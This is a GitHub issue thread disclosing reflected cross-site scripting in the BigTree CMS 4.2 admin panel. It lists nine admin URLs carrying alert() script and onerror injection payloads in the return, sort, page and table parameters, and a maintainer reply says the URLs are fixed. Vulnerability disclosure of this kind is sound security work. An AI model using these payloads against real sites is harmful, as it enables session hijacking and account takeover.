### ISSUE TITLE
Bigtree CMS 4.2 is vulnerable to Cross Site Scripting

### ISSUE THREAD

**Issue by sumitingole** [bigtreecms/BigTree-CMS#198]
Bigtree CMS 4.2

Vulnerability - Cross Site Scripting

Severity : Critical

Reported By - Sumit Ingole (Security analyst @Suma soft Pvt. Ltd Pune India)
=============================================================

Lets start....

A)Vulnerable URL's : 

1)/bigtree/admin/developer/templates/edit/?return=ed11c"><script>alert(1)</script>d58e9
                           Parameter  : "return="           

2)/bigtree/admin/developer/modules/edit/ff690"><img src=a onerror=alert(1)>34dc0/
                           
3)/bigtree/admin/developer/modules/edit/355b1"><img src=a onerror=alert(1)>a3c84/

4)/bigtree/admin/ajax/users/get-page/?sort=bc87d<script>alert(1)</script>d045a
                          parameter: "sort="

5)/bigtree/admin/ajax/users/get-emulate-page/?sort=47ac0<script>alert(1)</script>75695
                         parameter: "sort="

6)/bigtree/admin/ajax/settings/get-page/?page=</script><script>alert(1)</script>&query=
                        parameter: "page="

7)/bigtree/admin/ajax/developer/load-view-fields/?table=28297<script>alert(1)</script>96ea0
                       parameter: "table="

8)/bigtree/admin/ajax/developer/load-table-columns/?sort=true&table=62c7f<script>alert(1)</script>26965
                        parameter: "table="
                       
9)/bigtree/admin/ajax/developer/load-feed-fields/?table=ca344<script>alert(1)</script>c87a5
                         parameter: "table="

![1](https://cloud.githubusercontent.com/assets/11312706/7105347/cae008d0-e131-11e4-97ba-96305677dffd.PNG)
![2](https://cloud.githubusercontent.com/assets/11312706/7105350/caf61346-e131-11e4-8fb4-bd364ec070d7.PNG)
![3](https://cloud.githubusercontent.com/assets/11312706/7105355/cb734546-e131-11e4-94a3-7bab8b26ab55.PNG)
![4](https://cloud.githubusercontent.com/assets/11312706/7105348/cae5bb7c-e131-11e4-89dd-8621438061c3.PNG)
![5](https://cloud.githubusercontent.com/assets/11312706/7105354/cb59f7e4-e131-11e4-8ffa-4f84b3fd4348.PNG)
![6](https://cloud.githubusercontent.com/assets/11312706/7105349/caf028b4-e131-11e4-8267-ae8f8ce39af8.PNG)
![7](https://cloud.githubusercontent.com/assets/11312706/7105351/cb0623e4-e131-11e4-8909-3b911c9818ae.PNG)
![8](https://cloud.githubusercontent.com/assets/11312706/7105352/cb181c70-e131-11e4-81db-15024ce30151.PNG)
![9](https://cloud.githubusercontent.com/assets/11312706/7105353/cb1f91d0-e131-11e4-9c5c-d2a50949815c.PNG)

Waiting for your reply.......

**Comment by timbuckingham** [comment]
Thank you again for the security audit, the mentioned URLs should be fixed with the latest commits.
